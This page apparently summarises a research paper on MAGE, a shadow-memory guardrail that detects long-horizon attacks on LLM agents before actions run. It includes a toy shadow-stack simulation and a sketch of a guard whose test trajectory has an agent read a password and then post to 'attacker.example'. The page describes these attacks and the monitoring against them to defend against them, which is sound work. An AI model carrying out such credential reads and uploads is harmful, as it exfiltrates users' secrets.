MAGE: Safeguarding LLM Agents against Long-Horizon Threats via Shadow Memory

📅 2026-05-04
📈 Citations: 0
✨ Influential: 0

🤖 AI Summary
This work addresses the vulnerability of large language model (LLM) agents to long-horizon attacks. These attacks unfold over many user-agent-environment interactions, and existing defenses struggle to mitigate them. The authors propose MAGE, a security framework that introduces a memory-based defense paradigm inspired by the “shadow stack” concept in systems security. MAGE maintains a lightweight shadow memory that continuously records and distills security-relevant context from the agent's execution trajectory. Before each action is executed, a risk-prediction model uses this distilled memory to evaluate whether the action poses a threat. Across diverse long-horizon attack scenarios, MAGE substantially outperforms existing defenses in detection accuracy, detects most attacks at an early stage, and imposes negligible overhead on task performance, establishing a new direction for securing LLM agents.
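For readers outside systems security: a shadow stack keeps a second, protected copy of each function's return address and checks every return against that copy. If the return address on the ordinary stack has been overwritten, the mismatch is caught before control transfers. The toy Python simulation below illustrates only that check. It models memory as plain lists, the names `CallStack` and `ShadowStackViolation` are hypothetical, and it is not how hardware or compiler shadow stacks are actually implemented.

```python
class ShadowStackViolation(Exception):
    """Raised when a return address does not match its protected copy."""


class CallStack:
    """Toy model: an ordinary stack plus a shadow copy of return addresses."""

    def __init__(self) -> None:
        self.stack = []   # ordinary stack, assumed attacker-writable in this model
        self.shadow = []  # shadow stack, assumed unreachable by the attacker

    def call(self, return_addr: int) -> None:
        # On every call, record the return address in both places.
        self.stack.append(return_addr)
        self.shadow.append(return_addr)

    def ret(self) -> int:
        # On every return, compare the ordinary copy with the protected copy.
        addr = self.stack.pop()
        expected = self.shadow.pop()
        if addr != expected:
            raise ShadowStackViolation(
                f"return to {addr:#x}, expected {expected:#x}"
            )
        return addr


s = CallStack()
s.call(0x401000)
s.stack[-1] = 0xDEADBEEF  # simulate a buffer overflow overwriting the return address
try:
    s.ret()
except ShadowStackViolation as err:
    print("blocked:", err)  # → blocked: return to 0xdeadbeef, expected 0x401000
```

MAGE's shadow memory plays an analogous role for an agent: a dedicated, safety-focused record that pending actions are checked against before they run.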
πŸ“ Abstract
As large language model (LLM)-powered agents are increasingly deployed to perform complex, real-world tasks, they face a growing class of attacks that exploit extended user-agent-environment interactions to pursue malicious objectives that would be improbable in single-turn settings. Such long-horizon threats pose significant risks to the safe deployment of LLM agents in critical domains. In this paper, we present MAGE (Memory As Guardrail Enforcement), a novel defensive framework designed to counter a wide range of long-horizon threats. Inspired by the "shadow stack" abstraction in systems security, MAGE maintains a dedicated, safety-focused agentic memory that distills and retains safety-critical context across the agent's full execution trajectory, and it uses this shadow memory to proactively assess the risk of pending actions before they are executed. Extensive evaluation demonstrates that MAGE substantially outperforms existing defenses in detection accuracy across diverse long-horizon threats, detects the majority of attacks at an early stage, and introduces only negligible overhead to agent utility. To the best of our knowledge, MAGE is the first framework to detect and mitigate long-horizon threats using an agentic memory approach, establishing a new paradigm for this critical challenge and opening promising directions for future research.
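The abstract describes the mechanism only at a high level: retain distilled safety-critical context across the trajectory, and assess each pending action against it before execution. The Python sketch below illustrates that control flow under explicit assumptions; it is not MAGE's implementation. The names `Step`, `ShadowMemory`, `assess_risk`, and `run_guarded`, the keyword-based distillation rule, the tool names, and the 0.5 threshold are all hypothetical stand-ins for the model-based components the paper describes. The scenario shows why long-horizon context matters: an outbound upload is only mildly suspicious on its own, but becomes high-risk once an earlier step has read credentials.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Step:
    """Hypothetical record of one agent action: tool name plus argument text."""
    tool: str
    argument: str


# Illustrative assumptions: which strings count as sensitive, which tools can
# move data out of the environment, and the cut-off for blocking an action.
SENSITIVE_MARKERS = ("password", "api_key", "private_key")
EXFIL_TOOLS = {"http_post", "send_email"}
RISK_THRESHOLD = 0.5


@dataclass
class ShadowMemory:
    """Hypothetical safety-focused memory kept alongside the agent's context."""
    facts: list = field(default_factory=list)

    def distill(self, step: Step) -> None:
        # Keep only safety-critical facts rather than the full trajectory.
        # (A keyword rule stands in for MAGE's model-based distillation.)
        if any(m in step.argument.lower() for m in SENSITIVE_MARKERS):
            self.facts.append(("sensitive_read", step.tool))


def assess_risk(memory: ShadowMemory, pending: Step) -> float:
    """Hypothetical risk predictor: scores a pending action using shadow memory."""
    if pending.tool not in EXFIL_TOOLS:
        return 0.0
    # Outbound transfer is high-risk only if earlier steps touched sensitive data.
    if any(kind == "sensitive_read" for kind, _ in memory.facts):
        return 0.9
    return 0.3


def run_guarded(trajectory: List[Step]) -> Optional[int]:
    """Check each action before it runs; return the index of the first
    blocked step, or None if the whole trajectory is allowed."""
    memory = ShadowMemory()
    for i, step in enumerate(trajectory):
        if assess_risk(memory, step) >= RISK_THRESHOLD:
            return i  # blocked before execution
        # A real agent would execute the tool call here.
        memory.distill(step)
    return None


trajectory = [
    Step("read_file", "db_password=hunter2"),
    Step("summarize", "meeting notes"),
    Step("http_post", "https://attacker.example/upload"),
]
print(run_guarded(trajectory))  # → 2
```

Because the check runs before each action rather than after the trajectory completes, the returned index also shows how early an attack is stopped, loosely mirroring the early-stage detection the abstract reports.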
Problem

Research questions and friction points this paper is trying to address.

long-horizon threats
LLM agents
safety
adversarial attacks
agent-environment interaction
Innovation

Methods, ideas, or system contributions that make the work stand out.

shadow memory
long-horizon threats
LLM agents
safety enforcement
agentic memory